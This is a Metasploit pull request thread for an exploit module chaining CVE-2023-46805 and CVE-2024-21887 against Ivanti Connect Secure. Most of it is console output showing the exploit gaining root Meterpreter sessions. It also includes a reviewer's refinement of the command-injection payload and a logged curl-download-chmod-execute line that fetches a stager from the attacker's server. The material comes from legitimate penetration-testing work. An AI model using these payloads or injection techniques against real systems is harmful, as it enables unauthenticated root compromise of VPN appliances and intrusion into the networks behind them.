Ivanti Connect Secure RCE exploit module (CVE-2023-46805 and CVE-2024-21887)

[sfewer-r7]

This is a draft pull request for the recent 0day exploit chain against Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887)

For technical details on the vulnerabilities used in this exploit, read our AttackerKB Analysis:

To-Do:

• More testing
• Documentation

Example Usage

msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > check
[+] 192.168.86.111:443 - The target is vulnerable. IVE-OS 22.3R1 (1647)
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. IVE-OS 22.3R1 (1647)
[*] Sending stage (3045380 bytes) to 192.168.86.111
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.111:15258) at 2024-01-16 14:37:07 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.86.111
OS           :  (Linux 4.15.18.34-production)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > cat /home/ssl-vpn-VERSION
export DSREL_MAJOR=22
export DSREL_MINOR=3
export DSREL_MAINT=1
export DSREL_DATAVER=4802
export DSREL_PRODUCT=ssl-vpn
export DSREL_DEPS=ive
export DSREL_BUILDNUM=1647
export DSREL_COMMENT="R1"
meterpreter > 

[jvoisin]

Suggested change

	'type' => ";#{cmd};",
	'type' => ";#{cmd}#",

since this is a command injection, using a comment (#) will prevent the trailing part of the original command from being executed, and ultimately showing up in the log as it fails.

[sfewer-r7]

Turns out for this to work as expected you also must add in a space character before the comment. This is what was preventing the Linux payloads from working. The change in 4ff3998 also removes the need to bootstrap the Linux payloads. Every day's a school day, thanks @jvoisin 😄

[bwatters-r7]

get_json_document may be a better option

[sfewer-r7]

I implemented this suggestion via de6ed9e

[bwatters-r7]

Linux Command

msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > show options

Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas
                                       ploit.html
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      qwsUhgQYPx       no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set rhost 10.5.132.223
rhost => 10.5.132.223
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set FETCH_SRVHOST 10.5.135.201
FETCH_SRVHOST => 10.5.135.201
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set verbose true
verbose => true
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > run

[*] Command to run on remote host: curl -so /tmp/NuZBXSXwEe http://10.5.135.201:8080/v3vZxR3P-stuKWjUe6pCeA; chmod +x /tmp/NuZBXSXwEe; /tmp/NuZBXSXwEe &
[*] Fetch Handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /v3vZxR3P-stuKWjUe6pCeA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. IVE-OS 22.3R1 (1647)
[*] Client 10.5.132.223 requested /v3vZxR3P-stuKWjUe6pCeA
[*] Sending payload to 10.5.132.223 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 10.5.132.223
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.223:51540) at 2024-01-19 15:24:31 -0600

meterpreter > sysinfo
Computer     : 10.5.132.223
OS           :  (Linux 4.15.18.34-production)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

Unix Command

msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > show options

Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.5.132.223     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas
                                       ploit.html
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Unix Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. IVE-OS 22.3R1 (1647)
[*] Sending stage (24768 bytes) to 10.5.132.223
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.223:51542) at 2024-01-19 15:28:52 -0600

meterpreter > sysinfo
Computer     : localhost2
OS           : Linux 4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
Architecture : x64
Meterpreter  : python/linux
meterpreter > getuid
Server username: root
meterpreter > 

[bwatters-r7]

Release Notes

This PR adds an exploit chain that consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected.